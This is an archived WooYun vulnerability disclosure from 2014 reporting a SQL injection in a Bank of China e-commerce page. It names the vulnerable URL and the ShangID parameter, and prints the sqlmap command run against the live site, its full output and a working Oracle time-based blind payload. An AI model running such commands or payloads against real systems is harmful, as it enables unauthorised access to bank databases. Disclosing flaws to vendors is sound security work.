当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-086127

漏洞标题:中国银行某站SQL注入

相关厂商:中国银行

漏洞作者: 乌尼玛

提交时间:2014-12-06 21:02

修复时间:2015-01-20 21:04

公开时间:2015-01-20 21:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-06: 细节已通知厂商并且等待厂商处理中
2014-12-08: 厂商已经确认,细节仅向厂商公开
2014-12-18: 细节向核心白帽子及相关领域专家公开
2014-12-28: 细节向普通白帽子公开
2015-01-07: 细节向实习白帽子公开
2015-01-20: 细节向公众公开

简要描述:

中国银行某业务SQL注入漏洞.... 问题来了:你们漏洞为什么那么多呢?

详细说明:

虽然没有乌云账号,当我打开乌云主站后,看到齐刷刷的2个漏洞...
不经意打开一个页面...
传送门:

https://e.boc.cn/ehome/SQISOFT/web/webNew/nSellorActivityList.aspx?ShangID=ES0000000096


问题参数:ShangID

漏洞证明:

中国银行注入.jpg


localhost:sqlmap XXOO$ python sqlmap.py -u "https://e.boc.cn/ehome/SQISOFT/web/webNew/nSellorActivityList.aspx?ShangID=ES0000000096"
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 13:53:07
[13:53:07] [INFO] testing connection to the target URL
[13:53:08] [INFO] heuristics detected web page charset 'ISO-8859-2'
[13:53:08] [INFO] testing if the target URL is stable. This can take a couple of seconds
[13:53:09] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[13:53:10] [INFO] testing if GET parameter 'ShangID' is dynamic
[13:53:11] [INFO] confirming that GET parameter 'ShangID' is dynamic
[13:53:11] [INFO] GET parameter 'ShangID' is dynamic
[13:53:11] [WARNING] heuristic (basic) test shows that GET parameter 'ShangID' might not be injectable
[13:53:11] [INFO] testing for SQL injection on GET parameter 'ShangID'
[13:53:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:53:12] [WARNING] reflective value(s) found and filtering out
[13:53:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:53:16] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:53:17] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[13:53:18] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[13:53:30] [INFO] testing 'MySQL inline queries'
[13:53:30] [INFO] testing 'PostgreSQL inline queries'
[13:53:30] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:53:30] [INFO] testing 'Oracle inline queries'
[13:53:31] [INFO] testing 'SQLite inline queries'
[13:53:31] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[13:53:31] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[13:53:32] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[13:53:34] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:53:35] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[13:53:36] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[13:53:37] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:53:38] [INFO] testing 'Oracle AND time-based blind'
[13:54:00] [INFO] GET parameter 'ShangID' is 'Oracle AND time-based blind' injectable
[13:54:00] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[13:54:00] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[13:54:04] [INFO] checking if the injection point on GET parameter 'ShangID' is a false positive
GET parameter 'ShangID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 97 HTTP(s) requests:
---
Place: GET
Parameter: ShangID
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: ShangID=ES0000000096' AND 7136=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(105)||CHR(74)||CHR(103),5) AND 'BjNm'='BjNm
---
[13:55:04] [INFO] the back-end DBMS is Oracle
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP.NET 2.0.50727
back-end DBMS: Oracle

修复方案:

过滤..
研发团队拖出去打死....
这个业务爆很多漏洞了。

版权声明:转载请注明来源 乌尼玛@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-12-08 08:30

厂商回复:

周边业务

最新状态:

暂无